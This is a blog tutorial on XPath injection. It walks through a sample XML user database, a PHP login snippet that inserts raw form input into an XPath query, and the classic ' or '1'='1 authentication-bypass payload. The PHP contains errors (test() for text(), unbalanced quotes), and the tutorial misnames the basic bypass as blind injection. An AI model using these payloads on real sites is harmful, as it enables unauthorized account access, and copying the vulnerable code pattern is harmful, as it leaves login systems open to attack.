XPath Injection Tutorial by HackingLoops |
In XPath injection, we try to inject data into an application so that it executes user-controlled XPath queries. When successfully injected, this vulnerability may allow an hackers to bypass complete authentication systems or access information without proper authorization.
Lets learn with the help of examples that how XPath works, in below example we have a sample XML Database File:
<?xml version=”1.0″ encoding=”ISO-8859-1″?>
<HackingLoops_database>
<hackingloops_user>
<username>Hackingloops</username>
<password>testing123</password>
<account>Administrator</account>
</hackingloops_user>
<hackingloops_user>
<username>Lokesh</username>
<password>test1234</password>
<account>Subscriber</account>
</hackingloops_user>
<hackingloops_user>
<username>Destructive</username>
<password>mind123</password>
<account>Subscriber</account>
</hackingloops_user>
</HackingLoops_database>
The above code shows the basic format for how the XML file is used to store sensitive information.
Now if we want to retrieve the information about an administrator from the above XML file, we have to write a XPath query like below:
string(//hackingloops_user[username/text()=’Hackingloops’ and password/text()=’testing123′]/account/text())
The above XPath query is what the webmaster has embedded into his code in order to access the XML database document.
Now if the web designer has not property filtered the user input, then the hacker will be able to inject XPath code into the website and hence interfere with the query result. Here is the example of XPath query that hacker will use to hack the XML file database:
string(//hackingloops_user[username/text()=” or ‘1’ = ‘1’ and password/text()=” or ‘1’ = ‘1’]/account/text())
Did you notice what I injected in place of the username and password?
Note: The below technique web masters use XML and XPath in their website. This is how it will actually look:
<?php
$login = simplexml_load_file(“HackingLoops_database.xml”);
$result=$login->xpath(“//hackingloops_user[username/test()='”.$_POST[‘Hackingloops’].” AND password/text()='”.$_POST[‘testing123’].”‘”;
?>
Doesn’t that look similar to SQL injection?
Yes, it is, because the basic concept behind XPath and SQL injection are the same, both are possible only when the web designer has not properly handled the user input in his code (meaning the use of dynamic queries is not correctly handled). In my previous article about website hacking, H have shared a 10 step guide to stop SQL injection in websites.
Now XPath injection also has two types. The above technique is called Blind XPath injection and other one is called Advanced XPath Injection. Below is the Sample Blind XPath injection username and password:
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1
Now let me explain what the above username signifies as most of you might not know. The above username or password will result in a query whose output is always true, which means that the website will authenticate the user even if a username or a password have not been provided. Isn’t that interesting? It’s these types of mistakes by web designers that make a hackers job easy, but if they know about this exploit, they can be easily protected.
Leave a Reply